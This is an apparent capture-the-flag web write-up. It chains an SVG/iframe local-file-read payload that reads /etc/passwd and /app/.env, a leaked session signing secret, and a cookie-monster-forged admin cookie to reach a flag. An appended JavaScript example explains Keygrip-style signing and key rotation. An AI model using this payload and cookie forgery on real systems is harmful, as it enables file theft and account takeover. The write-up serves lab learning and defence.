Found a way to read local files through the SVG-to-PNG conversion LFI (CVE-2021-23631):

POST /api/export HTTP/1.1
Host: 138.68.175.87:30484
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://138.68.175.87:30484/dashboard
Content-Type: application/json
Origin: http://138.68.175.87:30484
Content-Length: 283
DNT: 1
Connection: close
Cookie: session.sig=4u6WkhlFO5u5hCXaxOP-HGYLD9s; session=eyJ1c2VybmFtZSI6InRlc3QyIn0=

{"svg":"`<svg-dummy></svg-dummy><iframe src=\"file:///etc/passwd\" width=\"100%\" height=\"1000px\"></iframe><svg viewBox=\"0 0 240 80\" height=\"1000\" width=\"1000\" xmlns=\"http://www.w3.org/2000/svg\"><text x=\"0\" y=\"0\" class=\"Rrrrr\" id=\"demo\">data</text></svg>`"}

Got the secret used to sign/verify the cookie from /app/.env:

SESSION_SECRET_KEY=5921719c3037662e94250307ec5ed1db

Used cookie-monster to generate the cookie:

root@sd-127123:/tmp# cat test.json
{"username":"admin"}
root@sd-127123:/tmp# cookie-monster -e -f test.json -k 5921719c3037662e94250307ec5ed1db
               _  _
             _/0\/ \_
    .-.   .-` \_/\0/ '-.
   /:::\ / ,_________,  \
  /\:::/ \  '. (:::/  `'-;
  \ `-'`\ '._ `"'"'\__    \
   `'-.  \   `)-=-=(  `,   |
       \  `-"`      `"-`   /

[+] Data Cookie: session=eyJ1c2VybmFtZSI6ImFkbWluIn0=
[+] Signature Cookie: session.sig=EYdvy2mhVoEznETyhYjNYFFZM8o

Burp Repeater:

GET /dashboard HTTP/1.1
Host: 138.68.150.120:31876
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://138.68.150.120:31876/
DNT: 1
Connection: close
Cookie: session=eyJ1c2VybmFtZSI6ImFkbWluIn0=; session.sig=EYdvy2mhVoEznETyhYjNYFFZM8o
Upgrade-Insecure-Requests: 1

The flag is in the source of the response:

var flag = 'HTB{ZZZZZZZZZZZZZZZZZZZZZZ}'
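
Why the leaked SESSION_SECRET_KEY was sufficient, and what key rotation has to look like to invalidate such a cookie, as an added example that is not part of the original write-up or the challenge code. It assumes Keygrip-style signing (HMAC-SHA1 over `name=value`, unpadded base64url), which the `session` / `session.sig` cookie pair suggests; the keys and the `demo` helper are constructed for illustration.

```javascript
// Added example: Keygrip-style cookie verification with key rotation (assumed scheme).
const crypto = require('crypto');

// HMAC-SHA1 over "name=value", emitted as base64url without padding.
function sign(name, value, key) {
  return crypto.createHmac('sha1', key).update(`${name}=${value}`)
    .digest('base64').replace(/\+/g, '-').replace(/\//g, '_').replace(/=+$/, '');
}

// Returns the index of the key that verifies the signature, or -1.
// Index 0 is the current key; higher indexes are older keys kept during rotation.
function verify(name, value, sig, keys) {
  const got = Buffer.from(String(sig));
  for (let i = 0; i < keys.length; i++) {
    const want = Buffer.from(sign(name, value, keys[i]));
    if (want.length === got.length && crypto.timingSafeEqual(want, got)) return i;
  }
  return -1;
}

// The data cookie is only base64-encoded JSON: readable by anyone and
// protected solely by the signature, so the secret is the whole trust boundary.
function decodeSession(value) {
  return JSON.parse(Buffer.from(value, 'base64').toString('utf8'));
}

// Constructed sample keys (not the value shown on the page).
const LEAKED_KEY = 'constructed-old-secret';
const NEW_KEY = crypto.randomBytes(32).toString('hex');

function demo() {
  const value = Buffer.from(JSON.stringify({ username: 'admin' })).toString('base64');
  const leakedSig = sign('session', value, LEAKED_KEY); // producible by anyone holding the key
  return {
    user: decodeSession(value).username,
    beforeRotation: verify('session', value, leakedSig, [LEAKED_KEY]),
    // Keeping the leaked key as a "grace period" fallback still accepts the cookie.
    graceRotation: verify('session', value, leakedSig, [NEW_KEY, LEAKED_KEY]),
    // Only dropping the leaked key from the list rejects it.
    afterRotation: verify('session', value, leakedSig, [NEW_KEY]),
    tampered: verify('session', value.replace(/.$/, 'A'), leakedSig, [LEAKED_KEY]),
  };
}

console.log(demo());
```

A non-zero index from `verify` is worth logging in production: it means a cookie was accepted under an old key.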